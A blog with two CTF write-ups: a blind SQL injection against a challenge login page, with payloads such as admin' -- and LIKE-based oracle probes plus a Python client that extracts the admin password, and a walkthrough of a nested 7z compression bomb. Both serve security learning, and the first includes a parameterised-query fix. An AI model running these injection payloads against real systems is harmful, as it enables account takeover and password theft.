
Sunday, September 6, 2015

MMA CTF 2015 - Login as admin! (30)

On this challenge I took an approach that was probably over-engineered: I used blind SQLi to find the password of the admin user.


You can login with 'test/test' credentials, which gives you this output:
You are test user.
logout

Let's try logging in as the admin user.

Initially I tried a simple SQL injection and it worked immediately:
Username: admin' --
This output came back, telling us we needed to go further and find the user's password:
Congratulations!!
You are admin user.
The flag is your password!
logout

This worked without setting the password field at all (the trailing -- comments out the rest of the query, so the password check never runs), which makes things easy. I didn't want to attempt dumping the password or joining it into the username, so I went the blind SQLi route instead, using the login result as a yes/no oracle for LIKE patterns against the password column. First probes:
admin' and password like '%' --
> Success!
admin' and password like 'MMA{%' --
> Success!
admin' and password like 'abcd%' --
> Expected Failure.

Now that we have that out of the way, let's write a Python client!
import string
import requests

url = "http://arrive.chal.mmactf.link/login.cgi"
injection = "admin' and password like '{}' --"

# The MMA{ prefix was confirmed above; only lowercase letters are tried.
allChars = string.ascii_lowercase

solution = "MMA{"

def found(c):
    print("Found! :: {}".format(c))
    print(solution)

while len(solution) < 80:
    for c in allChars:
        print('Attempt: {}'.format(c))
        content = requests.post(url, {
            "username": injection.format(solution + c + "%")
        }).text
        if 'invalid' not in content:
            # The login did not fail, so the known prefix plus this letter matches.
            solution += c
            found(c)
            break
        elif c == 'z':
            # No letter matched: '_' is LIKE's single-character wildcard, so it
            # stands in for the unknown character and the search moves on.
            solution += '_'
            found('_')


After a few cycles, this prints out:
  MMA{cats_alice_band}
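What the admin' -- and LIKE probes above do to the server's query, and the fix, as an added example that is not from the original post: a constructed SQLite user table with the same two accounts, a login built by string concatenation beside a parameterised one. The flag value and table layout are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the challenge's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("test", "test"), ("admin", "MMA{constructed_flag}")])
    return db

def login_vulnerable(db, username, password):
    """Query built by string concatenation: the shape that admin' -- exploits.

    With username = "admin' --" the SQL becomes
      ... WHERE username = 'admin' --' AND password = ''
    and everything after -- is a comment, so the password check is gone.
    A LIKE probe in the username turns the same hole into a yes/no oracle."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db, username, password):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None
```

With the fixed version the whole injected string is compared literally against the username column, so both the comment trick and the LIKE probes simply fail to log in.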

Monday, May 11, 2015

ASIS CTF 2015 - Keka Bomb (75)

Keka Bomb was a forensics challenge with a simple description: "Find the flag in this file." Pulling down the file went like all the others in ASIS' CTF: unxz it, then check the file type.
$ file keka
keka: 7-zip archive data, version 0.3

Let's try extracting it! :D
$ 7z e keka
# .....Takes a long time...
# No.

It ended up throwing out a few very large files (each 594 KB member in the listing below expands to 4 GB), and that's when I started doing it the way it was probably intended to be solved, like most zip/compression-bomb challenges:

- List the compressed files in the archive
- Extract only the one file whose compressed size differs, since that is the one that leads to the target

Here's the final solution I ended up going with:
$ 7z l keka
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,4 CPUs)

Listing archive: keka

--
Path = keka
Type = 7z
Method = LZMA
Solid = -
Blocks = 16
Physical Size = 9508910
Headers Size = 210

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-04-29 18:46:35 ....A   4194304000       594004  001.7z
2015-04-29 18:46:35 ....A   4194304000       594004  002.7z
2015-04-29 18:46:35 ....A   4194304000       594004  003.7z
2015-04-29 18:46:35 ....A   4194304000       594004  004.7z
2015-04-29 18:46:35 ....A   4194304000       594004  005.7z
2015-04-29 18:46:35 ....A   4194304000       594004  006.7z
2015-04-29 18:46:35 ....A   4194304000       594004  007.7z
2015-04-29 18:46:35 ....A   4194304000       594004  008.7z
2015-04-29 18:46:35 ....A   4194304000       594004  009.7z
2015-04-29 18:46:35 ....A   4194304000       594004  010.7z
2015-04-29 18:46:35 ....A   4194304000       594004  011.7z
2015-04-29 18:46:35 ....A   4194304000       594004  012.7z
2015-04-29 18:46:35 ....A   4194304000       598640  013.7z
2015-04-29 18:46:35 ....A   4194304000       594004  014.7z
2015-04-29 18:46:35 ....A   4194304000       594004  015.7z
2015-04-29 18:46:35 ....A   4194304000       594004  016.7z
------------------- ----- ------------ ------------  ------------------------
                           67108864000      9508700  16 files, 0 folders
Looks like this file differs:
2015-04-29 18:46:35 ....A   4194304000       598640  013.7z

Continuing by extracting only that one:
$ 7z e keka 013.7z
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,4 CPUs)

Processing archive: keka

Extracting  013.7z

Everything is Ok

Size:       4194304000
Compressed: 9508910
And for fun, let's watch our hard drive fill up as we cry:
watch 'ls -lahlahlahlah'
Cool, extracted a 3.9GB 7z file:
$ 7z l 013.7z
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,4 CPUs)

Listing archive: 013.7z

--
Path = 013.7z
Type = 7z
Method = LZMA
Solid = -
Blocks = 16
Physical Size = 9497888
Headers Size = 209

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-04-29 11:32:54 ....A   4194304000       593444  0001.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0002.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0003.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0004.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0005.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0006.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0007.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0008.7z
2015-04-29 11:32:54 ....A   4194304000       596019  0009.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0010.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0011.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0012.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0013.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0014.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0015.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0016.7z
------------------- ----- ------------ ------------  ------------------------
                           67108864000      9497679  16 files, 0 folders
------------------------------------------------------------

Rinse, and repeat!
NOTE: Rinsing in this case means deleting the left-over 3.9GB files.... don't want too many of those stacking up....

Differs:
2015-04-29 11:32:54 ....A   4194304000       596019  0009.7z
Extract:
$ 7z e 013.7z 0009.7z
Delete:
$ rm 013.7z
$ 7z l 0009.7z
...
2015-04-29 06:33:53 ....A   4194304000       593928  0000007.7z
...
$ 7z e 0009.7z 0000007.7z
$ 7z l 0000007.7z
...
2015-04-29 01:07:48 ....A   4194304000       592391  0000000008.7z
...
$ 7z e 0000007.7z 0000000008.7z
Finally, something more interesting! (I was almost ready to write a script.)
Listing archive: 0000000008.7z

--
Path = 0000000008.7z
Type = 7z
Method = LZMA
Solid = -
Blocks = 16
Physical Size = 9467826
Headers Size = 212

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_00
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_01
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_02
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_03
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_04
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_05
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_06
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_07
2015-04-27 00:20:03 ....A   4194304000       591769  bomb_08
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_09
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_10
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_11
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_12
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_13
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_14
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_15
------------------- ----- ------------ ------------  ------------------------
                           67108864000      9467614  16 files, 0 folders
------------------------------------------------------------
Looks like we have the final bomb! Let's extract it!
2015-04-27 00:20:03 ....A   4194304000       591769  bomb_08
...
$ 7z e 0000000008.7z bomb_08
Then after it's extracted, check the filetype again:
$ file bomb_08
bomb_08: data
Sweeeeet! We got some data! Let's run strings on it and see what comes up:
$ strings bomb_08
ASIS{f974da3203d155826974f4a66735a20b}
Bomb Defused!


So in retrospect, this was a pretty fun challenge, easy enough to do on the command line with nothing more than standard tools and 7-Zip. I could've written a script, but it wasn't too deep, and it was fun to do some hunting in the 7z realm.
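The script the post almost got around to writing, as an added example that is not the author's code: it parses the 7z l listing format shown above, picks the one member whose compressed size differs, extracts only that member, deletes the previous layer and repeats until the extracted file is no longer an archive. It assumes the 7z binary is on PATH; the sample listing is constructed from three rows of the keka listing.

```python
import os
import re
import subprocess
from collections import Counter

# Constructed sample of `7z l` output, trimmed to three rows of the post's keka listing.
SAMPLE_LISTING = """\
------------------- ----- ------------ ------------  ------------------------
2015-04-29 18:46:35 ....A   4194304000       594004  001.7z
2015-04-29 18:46:35 ....A   4194304000       598640  013.7z
2015-04-29 18:46:35 ....A   4194304000       594004  014.7z
------------------- ----- ------------ ------------  ------------------------
                           67108864000      9508700  16 files, 0 folders
"""

ENTRY_RE = re.compile(
    r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} \S{5}\s+(\d+)\s+(\d+)\s+(.+?)\s*$")

def parse_listing(text):
    """Return [(name, size, compressed)] for every file row (date, time, attrs, sizes, name)."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            size, compressed, name = m.groups()
            entries.append((name, int(size), int(compressed)))
    return entries

def pick_outlier(entries):
    """Name of the single member whose compressed size differs from the rest, else None."""
    counts = Counter(comp for _, _, comp in entries)
    if len(counts) < 2:
        return None
    common = counts.most_common(1)[0][0]
    odd = [name for name, _, comp in entries if comp != common]
    return odd[0] if len(odd) == 1 else None

def drill(archive, max_depth=10):
    """Follow the odd member down layer by layer, deleting each extracted layer (needs the real 7z)."""
    for depth in range(max_depth):
        proc = subprocess.run(["7z", "l", archive], capture_output=True, text=True)
        target = pick_outlier(parse_listing(proc.stdout)) if proc.returncode == 0 else None
        if target is None:   # not an archive, or no single odd member: this is the payload
            return archive
        subprocess.run(["7z", "e", "-y", archive, target], check=True, capture_output=True)
        if depth:            # rinse: drop the 3.9 GB intermediate layer, keep the original
            os.remove(archive)
        archive = target
    return archive
```

Each level still writes one 3.9 GB intermediate file, since 7z cannot partially decompress a member, which is why the loop removes the previous layer before descending.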